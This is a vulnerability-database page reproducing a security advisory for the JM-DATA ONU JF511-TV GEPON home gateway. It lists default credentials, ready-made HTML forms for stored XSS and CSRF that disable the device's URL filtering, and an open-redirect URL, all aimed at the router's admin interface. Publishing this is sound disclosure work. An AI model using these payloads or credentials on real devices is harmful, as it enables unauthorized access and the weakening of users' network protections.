Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

JM-DATA ONU JF511-TV Multiple Remote Vulnerabilities

🗓️ 14 Jun 2022 00:00:00Reported by NeurogenesiaType 
zeroscience
 zeroscience🔗 www.zeroscience.mk👁 300 Views

JM-DATA ONU JF511-TV Multiple Remote Vulnerabilities, Impact: XSS, Spoofing, System Acces

Code
<html><body><p>JM-DATA ONU JF511-TV Multiple Remote Vulnerabilities


Vendor: JM-DATA GmbH
Product web page: https://www.jm-data.at
Affected version: 1.0.67
                  1.0.62
                  1.0.55

Summary: This ONU is the perfect GEPON home and business gateway.
It is an all-rounder in perfection. It can BRIDGE/NAT/RIP ROUTEND
and COMBINED.

Desc: The device suffers from multiple vulnerabilities including:
Default Credentials, CSRF, Authenticated Stored XSS and Open Redirect.

Tested on: Boa/0.93.15


Vulnerability discovered by Neurogenesia
                            @zeroscience


Advisory ID: ZSL-2022-5708
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5708.php


24.04.2022

--


Default credentials:
--------------------
user:user


Stored XSS / HTML Injection:
----------------------------

  </p>
<form action="https://192.168.1.2:8443/boaform/admin/formURL" method="POST">
<input hidden="" name="url" type="hidden" value="'&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;' /&gt;
      &lt;input type="/>
<input name="submit-url" type="hidden" value="/secu_urlfilter_cfg_en.asp"/>
<input type="submit" value="Go"/>
</form>
  



CSRF (delete IP entry filter):
------------------------------

  
    <form action="https://192.168.1.2:8443/boaform/admin/formURL" method="POST">
<input name="bcdata" type="hidden" value="ld3:idxi0eee"/>
<input name="action" type="hidden" value="rm"/>
<input name="submit-url" type="hidden" value="/secu_urlfilter_cfg_en.asp"/>
<input type="submit" value="Go"/>
</form>
<form action="https://192.168.1.2:8443/boaform/admin/formURL" method="POST">
<input name="urlfilterEnble" type="hidden" value="off"/>
<input name="action" type="hidden" value="rm"/>
<input name="bcdata" type="hidden" value="ld3:idxi0eed3:idxi1eee"/>
<input name="submit-url" type="hidden" value="https://192.168.1.2:8443/secu_urlfilter_cfg_en.asp"/>
<input type="submit" value="Go"/>
</form>
  



Open Redirect:
--------------
https://192.168.1.2:8443/boaform/formWirelessTbl?submit-url=https://zeroscience.mk


common.js:
----------
/*
 * isCharUnsafe - test a character whether is unsafe
 * @c: character to test
 */
function isCharUnsafe(c)
{
  var unsafeString = "\"\\`\+\,='\t";

  return unsafeString.indexOf(c) != -1
    || c.charCodeAt(0) &lt;= 32
    || c.charCodeAt(0) &gt;= 123;
}

/*
 * isIncludeInvalidChar - test a string whether includes invalid characters
 * @s: string to test
 */
function isIncludeInvalidChar(s)
{
  var i;

  for (i = 0; i &lt; s.length; i++) {
    if (isCharUnsafe(s.charAt(i)) == true)
      return true;
  }

  return false;
}
</body></html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
14 Jun 2022 00:00Current
5.8Medium risk
Vulners AI Score5.8
jm-data onugepon home gatewaymultiple vulnerabilitiesdefault credentialscsrfauthenticated stored xssopen redirectboa/0.93.15neurogenesiazero science lab
300